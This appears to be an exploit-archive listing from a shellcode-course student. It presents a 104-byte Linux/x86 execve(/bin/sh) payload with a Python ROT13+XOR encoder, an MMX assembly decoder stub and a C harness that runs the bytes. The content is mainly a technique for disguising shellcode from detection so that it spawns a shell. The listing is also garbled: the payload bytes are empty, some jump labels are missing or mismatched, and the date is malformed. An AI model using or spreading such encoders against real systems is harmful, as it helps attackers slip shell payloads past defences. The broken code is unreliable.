Linux/x86 execve(/bin/sh) + MMX/ROT13/XOR Shellcode

104 bytes small Linux/x86 execve(/bin/sh) + MMX/ROT13/XOR shellcode (encoder/decoder).

MD5 | 91a1c7261b81497074a6cfeffc31630e

# Title: Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)
# Author: Kartik Durg
# Date: 201-10-04
# Shellcode Length: 104 BYTES
# Student-ID: SLAE-1233
# Write-up Link:
# Tested on: Ubuntu (i686)

a). Python script for encoder

# ROT13 - XOR Encoder

#original execve-stack
shellcode =

rot = 13

encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :
shell_rot = (x + rot)%256

# XOR Encoding
xor_rot = shell_rot^0xAA
encoded += '\\x'
encoded += '%02x' %xor_rot

encoded2 += '0x'
encoded2 += '%02x,' %xor_rot

print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))
Encoded shellcode ...
Len: 25

b). Decoder for ROT13-XOR encoded shellcode using MMX instructions
global _start

section .text

jmp short call_decoder

pop edi ;"edi" now points to "xor_value"
lea esi, [edi +16] ;"esi" now points to "Shellcode"
xor ecx, ecx
mov cl, 4 ;Size of our shellcode is 25|"qword" operates 8bytes ata time
hence 4*8=32|"loop" 4 times

movq mm0, qword [edi] ;move 8bytes of "xor_value" to mm0
movq mm1, qword [esi] ;move 8bytes of "Shellcode" to mm1
pxor mm0, mm1 ;Perform XOR operation
movq qword [esi], mm0 ;overwrite the "Shellcode" with previous results
add esi, 0x8 ;now "esi" points to next 8bytes of "Shellcode"
loop XOR_decode ;loop 4 times

lea edi, [edi +8] ;"edi" now points to "rot_value"
lea esi, [edi +8] ;"esi" now points to "Shellcode"|"Shellcode" contains
previous XOR'ed results
xor ecx, ecx
mov cl, 4 ;"loop" 4 times

movq mm2, qword [edi] ;move 8bytes of "rot_value" to mm2
movq mm3, qword [esi] ;move 8bytes of "Shellcode" to mm3
psubb mm3, mm2 ;Subtract 13 from "Shellcode"
movq qword [esi], mm3 ;overwrite the "Shellcode" with previous results
add esi, 0x8 ;now "esi" points to next 8bytes of "Shellcode"
loop ROT_decode ;"loop" 4 times
jmp short Shellcode ;Execute decoded shellcode


call decoder1
xor_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa
rot_value: db 13, 13, 13, 13, 13, 13, 13, 13
Shellcode: db

c). Shellcode.c

unsigned char shellcode[] = \

printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;

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